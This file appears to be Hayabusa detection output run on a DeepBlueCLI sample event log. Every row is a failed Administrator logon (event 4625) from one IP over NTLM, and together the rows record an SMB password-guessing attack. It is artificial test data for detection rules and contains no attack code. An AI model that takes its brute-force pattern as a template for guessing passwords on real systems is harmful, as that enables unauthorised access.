2016-09-20 01:50:43.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DK77Hylw8CJHVGvb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pf7DQVQY7AowT8NY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.762 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4us3HR9jseQWIHt8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vhJRmgooz8CXjB6E  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LkjIXxAvEDrPFUpZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ENc8aqouBangyUrU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7flMdluc8YRhOuzn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8WFqeMJIXGDjDP0a  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.015 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iKeRDzfuDCJSv4Wh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gNEYkgBoG8rAE6SP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vyy1aBvh6lJBs5M5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.146 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oyhiWNroUS5X5AEh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xg9rUUIwEfujwCvq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zfvpeyTKc3YYkVkw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VJGR6CYKLUJp2fWl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cmSap0AJZq0KMRBV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XnVCbq1IYZF19oYR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aVaDMa2uNXTZNcBj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ymf6Fhv5ieWwcq73  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CT6YMlX1GqeEuAHl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FDJ1IFpMNQ2Euhyn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EGTzqnHJIiZdSgNk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: epSckAKbAp8qag89  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NNC8ilAuznKPwFvV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.834 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wObt647cIBPiVaZi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nYDe1L7NNxDGQ0Vt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mXroClxv7B0aCTYv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:44.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kCVah2QOH1hMSV76  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.020 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2HjD65Xy4Hppim2l  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xwmEQxC4iTcF4aFu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.114 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: q3QxOH7ok8RR068t  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dJFj6Ckw1HdK9w52  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Qqu3Im4HXQNyGnYm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bk5dmjQDnpSlREum  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.279 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Pk4BvYgXBR2whf80  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i6n1su2TUr7ONQr4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: givsEAGfG0smN9Re  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i2YuM0i7a2QuY7xb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xuocQPZpd91adY0E  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PvGB1dZrfDWyZoqs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: w4oi8iL88rJo7g2Q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cF3OUnytXi4NjvqB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WKkJcp3TYj31iJUM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: G0E44RVqAE1feU0b  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ny5LCb1qOIUhxOPY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9jcDgzzqH26DjQ1k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yil94cFkU6UP24SK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bkdVHF3vggCcuNdn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:45.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4dRRI2CS3aVIX4nX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: chDZq3VgxIE2mRb9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.046 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HLVvgMmqLXKZADON  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i4avO2AJSlNb0IUL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Mdo5CvycGvGhn33y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: heJfjLl1vbX6lMjZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wOP1E6hd4Jtj4gob  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Xa7kMCNz0bEGTBqX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HSxTQ4HsZt2DeYVe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YxHpSQwFSV4hveVM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n3OwzSPomxZLoCe6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: e9IfwDZIfYT6A50K  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.463 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JOf6DbRX4zlNqLdb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 00kXrnJNH40NyoYL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nsNHcb9pnpdRgeL7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ucMhgxMXy9Ch1jNm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Cfi3ZaLTECJgjM9x  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: usugjEEBHlhJvOyu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WQ1pM2CVLt5ITVD5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.746 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NIboW7hNljF3HPpk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rOk5W4rkSYRRw4xS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AJTfcwd8rnFc06iF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.930 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6sm415W5zkvjdnTV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:46.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KEiSbtlmW4ou1mc7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:47.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xWeZV5pHt94adwUy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
